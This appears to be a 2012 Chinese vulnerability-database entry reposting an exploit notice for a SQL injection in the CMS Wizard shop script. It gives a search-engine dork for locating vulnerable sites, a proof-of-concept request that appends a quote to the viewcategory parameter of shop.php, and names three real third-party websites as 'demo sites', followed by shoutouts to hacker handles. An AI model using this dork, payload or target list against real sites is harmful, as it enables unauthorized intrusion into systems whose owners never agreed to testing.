CMS Wizard SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047319 漏洞类型
发布时间 2012-06-09 更新时间 2012-06-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060094
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Title : CMS Wizard SQL Injection Vulnerbility
Date : 7th June 2012
Author : Mr.Gh0st [Cyb3r.pr3dat0r@gmail.com]
Vendor : http://www.cmswizard.co.uk/
Dork : intext:Powered by CMS Wizard inurl:shop.php?viewcategory=
Tested On :Arch Linux
P0c : /shop.php?viewcategory=104'
Demo Site :
http://www.baby-basket.co.uk/shop.php?viewcategory=104'
http://www.homesweethomestyle.co.uk/shop.php?viewcategory=104'
http://www.csm.org.uk/shop/shop.php?viewcategory=30'

Shoutz : Infam0us , Golden BoY , s3v3n , Vanish3r , ph4nt0mc0d3r , 0xHAT
and all other members of www.code104.net